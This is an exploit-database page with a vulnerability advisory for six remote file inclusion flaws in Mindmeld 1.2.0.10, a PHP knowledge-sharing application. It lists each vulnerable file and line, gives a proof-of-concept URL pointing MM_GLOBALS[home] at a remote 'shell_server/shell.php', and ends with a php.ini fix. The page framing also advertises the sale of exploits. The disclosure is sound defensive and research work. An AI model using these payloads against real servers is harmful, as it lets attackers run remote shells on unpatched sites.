0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Mindmeld 1.2.0.10 Multiple Remote File Inclusion Vulnerabilities
================================================================ Mindmeld 1.2.0.10 Multiple Remote File Inclusion Vulnerabilities ================================================================ Summary Mindmeld is an, "enterprise-capable knowledge-sharing system" written in PHP. There are multiple remote file inclusion vulnerabilities in Mindmeld version 1.2.0.10 (latest version). Details 1. Vulnerable File and Line: Mindmeld-1.2.0.10/acweb/admin_index.php: line 51 require_once ( $MM_GLOBALS['home']."include/utilities.inc" ); PoC: http://server/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://shell _server/shell.php? --- 2. Vulnerable file and line: Mindmeld-1.2.0.10/include/ask.inc.php: line 34 require_once ( $MM_GLOBALS['home'] . "interfaces {$MM_GLOBALS['interface']}/include/" . "interface_{$MM_GLOBALS['interface']}_ask.inc" ); PoC: http://server/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=http:// shell_server/shell.php?php? --- 3. Vulnerable File and Line: Mindmeld-1.2.0.10/include/learn.inc.php: line 38 require_once ( $MM_GLOBALS['home'] . "interfaces/ {$MM_GLOBALS['interface']}/include/" PoC: http://server/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=http://shell _server/shell.php? --- 4. Vulnerable File and Line: Mindmeld-1.2.0.10/include/manage.inc.php: line 31 require_once ( $MM_GLOBALS['home'] . "interfaces/ {$MM_GLOBALS['interface']}/include/" PoC: http://server/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=http://shell _server/shell.php? --- 5. Vulnerable File and Line: Mindmeld-1.2.0.10/include/mind.inc.php: line 33 require_once( $MM_GLOBALS['home'] . 'include/utilities.inc' ); PoC: http://server/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=http://shell _server/shell.php? --- 6. Vulnerable File and Line: Mindmeld-1.2.0.10/include/sensory.inc.php: line 70 require_once ( $MM_GLOBALS['home'] . "include/utilities.inc" ); PoC: http://server/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=http://shell _server/shell.php? --- It appears that these vulnerabilities are not vulnerable to local file includes. These vulnerabilities have been disclosed to the vendor although development on this software has stopped. Sources: http://mindmeld.sourceforge.net/ Quick Fix: In php.ini, disable the following variables: register_globals, allow_url_fopen, and allow_url_include. Credit: David Wharton # 0day.today [2024-11-16] #